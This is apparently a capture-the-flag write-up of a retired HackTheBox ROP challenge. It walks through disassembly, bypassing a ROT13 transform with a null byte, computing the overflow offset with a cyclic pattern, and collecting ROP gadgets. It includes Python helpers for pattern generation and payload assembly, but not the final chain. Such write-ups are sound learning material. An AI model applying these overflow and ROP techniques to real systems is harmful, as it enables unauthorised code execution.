This is a recently retired binary exploitation (pwn) challenge from HackTheBox. It is a 64-bit ELF binary with NX protection enabled. Based on the name we already know we need to use ROP to exploit this binary. I will be using Cutter for reverse engineering this binary.
Cutter is a free and open source reverse engineering (RE) platform powered by radare2.
I assume that anyone reading this post is familiar with the basics of binary exploitation, as I skipped explaining many basic things. And please note that I am just learning these concepts; none of this is new research or expert opinion.
Open the binary in Cutter and select the aaa option to analyze it.
The aaa command runs several analysis passes over the binary, including:
- aac - analyze function calls
- aar - analyze len bytes of instructions for references
- afta - do type matching analysis for all functions
Binary protection:
Using the checksec command we can check which protections are enabled in the binary.
- As expected, the binary has a non-executable stack (NX), so we cannot run shellcode from the stack and must instead reuse code that is already in the binary.
For further analysis I decompiled the binary; here is a snippet of main's pseudocode.
- Prints a welcome message: "Please dont hack me"
- Calls read to read 500 bytes from stdin. This read is the bug: it accepts up to 500 bytes without regard for the size of the destination buffer on the stack, which the crash later in this post confirms.
- strcmp compares the entered string with "DEBUG"
From the graph view of main we can see that, at the end, the program calls another function.
Let's have a look at this function.
To decompile a function, right-click on it and select Show in decompiler.
What does this function do?
- It applies ROT13 to the input we entered.
- It adds or subtracts 0xd (13) to or from every alphabetic character.
- We can bypass this by putting a null byte at the beginning of our payload: the function treats the input as a null-terminated string and stops at the first null byte, so everything after it is left untouched.
ROT13 ("rotate by 13 places", sometimes hyphenated ROT-13) is a simple letter substitution cipher that replaces a letter with the 13th letter after it in the alphabet.
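To make the transform concrete, here is an added example (not code from the challenge binary or from the original post) that models the function as described above: one pass over the input buffer, adding or subtracting 0xd from each letter. It assumes, as the null-byte bypass implies, that the loop walks the buffer like a C string and stops at the first zero byte; the sample inputs are constructed here.

```python
def rot13_buffer(data: bytes) -> bytes:
    """Model of the binary's post-read transform.

    Assumption (not shown on the page, but implied by the null-byte bypass):
    the loop treats the buffer as a null-terminated string and stops at the
    first zero byte. Letters A-M / a-m get 0xd added, letters N-Z / n-z get
    0xd subtracted, every other byte is left alone.
    """
    out = bytearray(data)
    for i, c in enumerate(out):
        if c == 0:
            break  # null terminator: the rest of the buffer is untouched
        if 0x41 <= c <= 0x4D or 0x61 <= c <= 0x6D:    # A-M, a-m
            out[i] = c + 0xD
        elif 0x4E <= c <= 0x5A or 0x6E <= c <= 0x7A:  # N-Z, n-z
            out[i] = c - 0xD
    return bytes(out)


def first_mangled_index(sent: bytes) -> int:
    """Index of the first byte the transform changed, or -1 if it changed nothing.

    Useful when a fuzz payload comes back different from what was sent:
    it tells you where the mangling starts.
    """
    got = rot13_buffer(sent)
    for i, (a, b) in enumerate(zip(sent, got)):
        if a != b:
            return i
    return -1


if __name__ == "__main__":
    # Constructed sample: a naive fuzz payload (filler plus the start of a
    # Metasploit-style pattern) and what it looks like after the transform.
    naive = b"A" * 8 + b"Aa0Aa1Aa2Aa3"
    print(rot13_buffer(naive))            # letters shifted, digits untouched
    print(first_mangled_index(naive))     # 0: mangled from the very first byte
    # Same payload with a leading null byte: nothing after it is modified.
    guarded = b"\x00" + naive
    print(rot13_buffer(guarded) == guarded)
```

Because the pass is its own inverse on every byte (applying it twice gives the original), pre-encoding the whole payload would also survive it, but the leading null byte is simpler and does not depend on the exact byte ranges the binary checks.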
With the binary analysis out of the way, let's start exploiting.
I will use a pwntools-based script to fuzz the binary.
After running the script, watch GDB for crashes.
- The program crashed and the registers were overwritten, but not with the payload we sent!
- We sent "A"s but they were overwritten with "nnnnn".
- What happened here is that the ROT13 function mangled our payload. From the binary analysis we know there is a function that applies ROT13 to the input we enter.
Let's modify our script to get around ROT13.
- Open the program in GDB and set a breakpoint.
- Send the unique pattern to the program.
- Add a null byte at the start of the payload to stop ROT13 from touching it.
After running the script, press "c" in GDB to continue execution.
The program receives a segmentation fault and crashes.
To calculate the offset, copy the value in RIP into Metasploit's pattern_offset tool. One caveat on x86-64: eight ASCII pattern bytes form a non-canonical address, so ret faults before that value ever reaches RIP. If RIP still points at the function's own ret instruction, take the 8 bytes at the top of the stack (RSP) instead and feed those to pattern_offset.
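The pattern step can also be done without Metasploit or pwntools. The following added example (not from the original post) regenerates the same Aa0Aa1... sequence as Metasploit's pattern_create, recovers the offset from the crashed register value (or from raw bytes taken off the stack), and assembles the final buffer with the leading null byte so that the chain lands exactly on the saved return address. The pattern length (500, matching the read), the example crash value and the dummy chain bytes are constructed here; the real chain is whatever packed gadget addresses you collect in the next step.

```python
import string


def pattern_create(length: int) -> bytes:
    """Reproduce Metasploit's pattern_create: 3-byte groups Aa0, Aa1, ..., Ab0, ...

    Every 3-byte group is unique within the first 20280 bytes, so any window
    of 4 or more bytes occurs exactly once and locates itself.
    """
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the 20280-byte unique sequence")


def pattern_offset(value, length: int = 500) -> int:
    """Offset of a crashed register value inside pattern_create(length), or -1.

    value is either the integer GDB printed (e.g. 0x6341356341346341), which is
    converted back to the little-endian bytes that sat on the stack, or the raw
    bytes read from the stack. The bytes form is what you need on x86-64 when
    the non-canonical pattern value never made it into RIP and has to be read
    from RSP instead.
    """
    if isinstance(value, int):
        needle = value.to_bytes(8, "little").rstrip(b"\x00")
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


def build_payload(offset: int, chain: bytes, total: int = 500) -> bytes:
    """Assemble the buffer the binary reads: a leading null byte to stop the
    ROT13 pass, filler up to the saved return address, then the chain.

    offset is measured from the start of the pattern, i.e. what pattern_offset
    returns, and does not count the null byte that was sent in front of it.
    """
    payload = b"\x00" + b"A" * offset + chain
    if len(payload) > total:
        raise ValueError("payload does not fit in the %d-byte read" % total)
    return payload


if __name__ == "__main__":
    # Constructed crash value: what GDB would show if the saved return address
    # sat 72 bytes into the pattern ("Ac4Ac5Ac" read as a little-endian qword).
    crashed = 0x6341356341346341
    off = pattern_offset(crashed)
    print("offset:", off)
    # Dummy chain standing in for the packed gadget addresses (assumption: the
    # real chain is built from the ROPGadget output in the next step).
    chain = b"\xef\xbe\xad\xde\x00\x00\x00\x00"
    payload = build_payload(off, chain)
    print(payload[1 + off:] == chain)     # chain starts exactly at the saved RIP
```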
Collecting ROP Gadgets
I used the ROPGadget tool to find the gadgets.
Below are the gadgets we need to form our ROP chain.
That's all we need to build the exploit.
Running the exploit, we get a local shell.
This was a great challenge; I learned a few new binary exploitation techniques.
You can find all code for this challenge from my github repo: https://github.com/d3b4g/ropchallenges/